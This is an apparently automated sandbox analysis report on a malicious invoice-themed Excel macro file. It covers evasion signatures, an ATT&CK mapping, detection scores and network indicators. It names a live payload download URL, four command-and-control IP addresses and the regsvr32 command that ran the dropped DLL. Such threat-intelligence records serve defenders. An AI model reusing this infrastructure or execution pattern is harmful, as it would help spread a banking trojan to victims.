Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -275000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -484000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -271000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -319000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -141000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -299000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -279000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -241000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -282000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -288000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE TID: 2712	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_0048CEF8 FindFirstFileExW,

4_2_0048CEF8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00473930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

4_2_00473930

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_001D88DD rdtsc

4_2_001D88DD

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00476C50 LdrLoadDll,

4_2_00476C50

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001FB5D0 mov eax, dword ptr fs:[00000030h]		4_2_001FB5D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001FB6D0 mov eax, dword ptr fs:[00000030h]		4_2_001FB6D0

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00477A60 RtlAddVectoredExceptionHandler,

4_2_00477A60

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 80.86.91.27 236	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 5.100.228.233 61	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 46.105.131.65 232	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 77.220.64.37 187	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1804			Jump to behavior

Source: regsvr32.exe, 00000003.00000002.2382209582.00000000008A0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382512922.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2382209582.00000000008A0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382512922.0000000000980000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2382209582.00000000008A0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382512922.0000000000980000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00472980 GetUserNameW,

4_2_00472980

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Process Injection112	Masquerading11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting22	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Network Configuration Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	File and Directory Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Information Discovery14	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INV9698791470-20210111920647.xlsm	30%	Virustotal		Browse
INV9698791470-20210111920647.xlsm	17%	ReversingLabs	Script-Macro.Trojan.Wacatac

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\deibsjhv.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip	33%	ReversingLabs	Win32.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\deibsjhv.dll	33%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cdn.digicertcdn.com	0%	Virustotal		Browse
inmindppe.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://46.105.131.65/D	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://80.86.91.27/	0%	Avira URL Cloud	safe
https://77.220.64.37/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://46.105.131.65/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://inmindppe.com/eb3kd1le.zip	0%	Avira URL Cloud	safe
https://80.86.91.27/h	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://5.100.228.233/	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.digicertcdn.com	104.18.10.39	true	false	0%, Virustotal, Browse	unknown
inmindppe.com	160.153.133.116	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://inmindppe.com/eb3kd1le.zip	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	false		high
https://46.105.131.65/D	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com	DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://80.86.91.27/	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://77.220.64.37/	regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	false		high
https://46.105.131.65/	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmp	false		high
https://80.86.91.27/h	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://ocsp.entrust.net0D	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	false		high
https://5.100.228.233/	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.2382287592.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382544671.0000000001D80000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230070826.0000000002360000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
5.100.228.233	unknown	Netherlands	8315	SENTIANL	true
80.86.91.27	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
160.153.133.116	unknown	United States	21501	GODADDY-AMSDE	false
46.105.131.65	unknown	France	16276	OVHFR	true
77.220.64.37	unknown	Italy	44160	INTERNETONEInternetServicesProviderIT	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338095
Start date:	11.01.2021
Start time:	16:51:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INV9698791470-20210111920647.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.expl.evad.winXLSM@9/21@1/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.5% (good quality ratio 1.5%) Quality average: 78% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 89% Number of executed functions: 21 Number of non-executed functions: 59
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 93.184.221.240, 2.20.142.210, 2.20.142.209, 104.43.139.144, 104.18.10.39 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, wu.azureedge.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:51:48	API Interceptor	1116x Sleep call for process: regsvr32.exe modified
16:52:03	API Interceptor	512x Sleep call for process: DWWIN.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
5.100.228.233	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
80.86.91.27	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
46.105.131.65	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
77.220.64.37	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.EncPk-APV.3900.dll	Get hash	malicious	Browse
	ygyq4p539.rar.dll	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.digicertcdn.com	SurfsharkSetup.exe	Get hash	malicious	Browse	104.18.10.39
	https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1	Get hash	malicious	Browse	104.18.10.39
	ASHLEY NAIDOO CV.doc	Get hash	malicious	Browse	104.18.10.39
	RFQ.doc	Get hash	malicious	Browse	104.18.10.39
	SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe	Get hash	malicious	Browse	104.18.11.39
	http://test.kunmiskincare.com/index.php	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3D	Get hash	malicious	Browse	104.18.10.39
	https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3D	Get hash	malicious	Browse	104.18.11.39
